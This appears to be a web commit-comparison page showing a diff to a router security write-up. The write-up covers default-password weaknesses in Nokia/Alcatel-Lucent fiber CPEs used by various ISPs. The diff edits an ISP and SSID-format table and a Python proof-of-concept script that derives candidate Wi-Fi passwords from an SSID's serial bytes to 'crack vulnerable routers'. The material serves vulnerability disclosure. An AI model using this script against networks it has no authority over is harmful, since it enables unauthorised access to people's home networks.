Compare commits
No commits in common. "master" and "master" have entirely different histories.
40
Readme.md
40
Readme.md
@ -13,7 +13,6 @@ This type of connection requires different equipment than ADSL/VDSL and thus spe
|
|||||||
|
|
||||||
Technicolor, along with Alcatel-Lucent, Nokia and Huawei are the leading manufactures of these devices and the suppliers for ISPs. Unsurprisingly, many different devices from even different companies have the same components and sometimes even share some software stack: below is a noncomprehensive table of confirmed and suspected devices having the same common problems described later. Apparently there's also a reseller called Zhone that customizes the same CPE for some ISPs. Eltex might be another one.
|
Technicolor, along with Alcatel-Lucent, Nokia and Huawei are the leading manufactures of these devices and the suppliers for ISPs. Unsurprisingly, many different devices from even different companies have the same components and sometimes even share some software stack: below is a noncomprehensive table of confirmed and suspected devices having the same common problems described later. Apparently there's also a reseller called Zhone that customizes the same CPE for some ISPs. Eltex might be another one.
|
||||||
|
|
||||||
_UPDATE:_ Thanks to some contributions some ISPs not in the original XML files have been added and other have been updated.
|
|
||||||
|
|
||||||
| CODE | Country | ISP | Manufacturer | Model | SSID Format |
|
| CODE | Country | ISP | Manufacturer | Model | SSID Format |
|
||||||
|---|---|---|---|---|---|
|
|---|---|---|---|---|---|
|
||||||
@ -44,11 +43,9 @@ _UPDATE:_ Thanks to some contributions some ISPs not in the original XML files h
|
|||||||
| LATT | Latvia | Lattelekom | Unknown | Unknown | `ALHN-%s` |
|
| LATT | Latvia | Lattelekom | Unknown | Unknown | `ALHN-%s` |
|
||||||
| JPNX | Japan | Unknown | Unknown | Unknown | `ALHN-%s` |
|
| JPNX | Japan | Unknown | Unknown | Unknown | `ALHN-%s` |
|
||||||
| LAOS | Laos | Sky Telecom | Unknown | Unknown | `SKYTEL-%4s` |
|
| LAOS | Laos | Sky Telecom | Unknown | Unknown | `SKYTEL-%4s` |
|
||||||
| VIVA | Bulgaria | Vivacom | Unknown | Unknown | `VIVACOM_FiberNet-%4s` |
|
| VIVA | Bulgaria | Vivacom | Unknown | Unknown | `VIVACOM_FiberNet` |
|
||||||
| PXSF | Belgium | Belgacom | Unknown | Unknown | Unspecified |
|
| PXSF | Belgium | Belgacom | Unknown | Unknown | Unspecified |
|
||||||
| OCIT | Ivory Coast | Orange Ivory Coast | Nokia | G-240W-A | `ORANGEFIBER-%4s` |
|
| OCIT | Ivory Coast | Orange Ivory Coast | Nokia | G-240W-A | `ORANGEFIBER-%4s` |
|
||||||
| Unknown | Caraibes | Canalbox Caraibes | Unknown | Unknown | `CANALBOX-%4s` |
|
|
||||||
| Unknown | Poland | Inea | Unknown | Unknown | `INEA-%4s` |
|
|
||||||
|
|
||||||
## FCC Infos
|
## FCC Infos
|
||||||
Different enclosures or slight variants of the same board can be identified by looking at the [documents published by Nokia for the FCC](https://fccid.io/2ADZR).
|
Different enclosures or slight variants of the same board can be identified by looking at the [documents published by Nokia for the FCC](https://fccid.io/2ADZR).
|
||||||
@ -496,28 +493,28 @@ With this information we can write a PoC script that can produce a wordlist to e
|
|||||||
import argparse, base64, hashlib, re
|
import argparse, base64, hashlib, re
|
||||||
|
|
||||||
def genpwd_longpasswd(oui, serialnum):
|
def genpwd_longpasswd(oui, serialnum):
|
||||||
def str2md5(string):
|
def str2md5(string):
|
||||||
m = hashlib.md5()
|
m = hashlib.md5()
|
||||||
m.update(string.encode("ascii"))
|
m.update(string.encode("ascii"))
|
||||||
return m.digest()
|
return m.digest()
|
||||||
|
|
||||||
#secret1 = "%s-ALCL%s" % (oui, serialnum)
|
#secret1 = "%s-ALCL%s" % (oui, serialnum)
|
||||||
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
|
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
|
||||||
|
|
||||||
#md5_secret1 = str2md5(secret1)
|
#md5_secret1 = str2md5(secret1)
|
||||||
md5_secret2 = str2md5(secret2)
|
md5_secret2 = str2md5(secret2)
|
||||||
|
|
||||||
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
|
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
|
||||||
|
|
||||||
lower = upper = 0
|
lower = upper = 0
|
||||||
|
|
||||||
for i in range(8):
|
for i in range(8):
|
||||||
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
|
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
|
||||||
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
|
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
|
||||||
|
|
||||||
longpasswd = ((upper<<32)+lower)%0x2540be400
|
longpasswd = ((upper<<32)+lower)%0x2540be400
|
||||||
|
|
||||||
return longpasswd
|
return longpasswd
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
|
parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
|
||||||
parser.add_argument("ssid", type=str, help="the ssid to attack")
|
parser.add_argument("ssid", type=str, help="the ssid to attack")
|
||||||
@ -554,9 +551,8 @@ for s in ssids:
|
|||||||
serialBytes = args.ssid
|
serialBytes = args.ssid
|
||||||
for r in s.split("[A-F0-9]{4}"):
|
for r in s.split("[A-F0-9]{4}"):
|
||||||
serialBytes = serialBytes.replace(r, "")
|
serialBytes = serialBytes.replace(r, "")
|
||||||
for i in range(0xffff + 1):
|
for i in range(0xffff):
|
||||||
candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
|
print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes)))
|
||||||
print(f"{candidate:010}")
|
|
||||||
break
|
break
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|||||||
Loading…
Reference in New Issue
Block a user